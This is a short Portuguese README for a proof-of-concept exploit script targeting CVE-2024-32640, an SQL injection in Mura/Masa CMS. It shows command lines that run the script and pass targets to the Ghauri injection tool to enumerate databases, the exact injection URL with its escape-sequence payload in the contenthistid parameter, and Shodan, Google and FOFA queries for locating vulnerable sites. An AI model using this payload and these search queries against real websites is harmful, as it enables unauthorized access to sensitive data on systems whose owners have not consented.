
CVE-2024-32640 | PoC de Exploração Automática de SQLi
python3 CVE-2024-32640.py --url https://target.com/
Insira quaisquer argumentos que deseje usar com o Ghauri, seguindo sua lista de argumentos:
python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"
python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

Usando a detecção que implementei na ferramenta, podemos então usar o alvo vulnerável para explorar no Ghauri. O script automatiza esse processo, analisando todas as informações necessárias do alvo em uma chamada ao Ghauri.

Ao anexar uma sequência de escape (%5c) ao valor do parâmetro de consulta HTML contenthistid, somos capazes de verificar se um alvo é vulnerável a este SQLi.
A exploração bem-sucedida pode levar ao acesso não autorizado a dados sensíveis.
URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x
Consulta Shodan: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
https://twitter.com/HunterMapping/status/1790620695371911388